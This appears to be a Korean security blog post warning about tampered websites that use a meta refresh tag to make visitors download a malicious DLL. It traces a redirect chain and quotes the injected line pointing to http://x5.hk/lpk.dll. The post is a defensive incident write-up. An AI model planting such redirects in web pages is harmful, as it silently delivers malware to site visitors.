[사이트 변조] Meta http-equiv="refresh" 함수를 이용한 악성코드 다운로드 방식 주의!!

기존의 사이트 변조는 InternetExplorer, Adobe Flash Player, Java Exploit 등 소프트웨어의 취약점 방식을 이용하여 

접속 된 PC가  취약점이 존재 할 시 특정 파일을 받게 되는 드라이브 바이 다운로드(Drive-by-Download)방식이 대부분 이였다.

그래서 이전에 기존 사이트 변조와는 다른 iframe, Document.Referrer 함수를 이용한 악성코드 다운로드 방식을 소개 한 적이 있었다.

• [사이트 변조] iframe 태그를 이용한 악성코드 다운로드 방식 주의!!

• [사이트 변조] Document.Referrer 함수를 이용한 악성코드 다운로드 방식 주의!!

이번에 확인 된 내용은 기존 Document.Referrer 함수를 이용한 사이트 변조와 유사하지만, 

exe를 다운로드 시키는 것이 아니라 dll 파일을 다운로드 시킨다는 것이 조금 다르다.

그럼 간단하게 이번 방식에 대해서 알아보자.

우선 실제 유포가 되고 사이트를 한번 확인해 볼 필요가 있다.

유포 사이트에는 아래와 같은 스크립트가 삽입되어 있었다.

(※ 파일 수집은 7월 4일에 이루어져있고, 현재는 변조 된 스크립트는 삭제 되었음을 미리 알림!!)

1. 최초 사이트 링크 : http://www.screenworld.co.kr

<HTML>

<HEAD>

<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no, target-densitydpi=medium-dpi' />

<TITLE>스크린월드</TITLE>

</HEAD>

<FRAMESET ROWS="100%,*" border=0>

<FRAME src=http://maxscreen.co.kr></FRAMESET>

</HTML>

2. 리다이렉션 된 사이트 링크 내부 스크립트 : http://maxscreen.co.kr

<meta http-equiv="refresh" content="0;url=http://maxscreen.co.kr/home">

3. 2차 리다이렉션 사이트 링크 내부 삽입 된 스크립트

<meta http-equiv="refresh" content="0.1; url=http://x5.hk/lpk.dll"></meta>

※ 삽입 된 스크립트는 url로 등록 된 http://x5.hk/lpk.dll 를 content에 셋팅 된 0.1초 후 새로고침과 동시에 이동하라는 내용

아래는 실제 접속 시 나오는 다운로드 화면이다.

다운로드 된 lpk.dll 파일은 정상적인 PE구조를 가지고 있지 않아 분석은 하지 않았다.

그런데 궁금한점은....왜 EXE가 아니라 DLL 이였을까? 하는 것이다.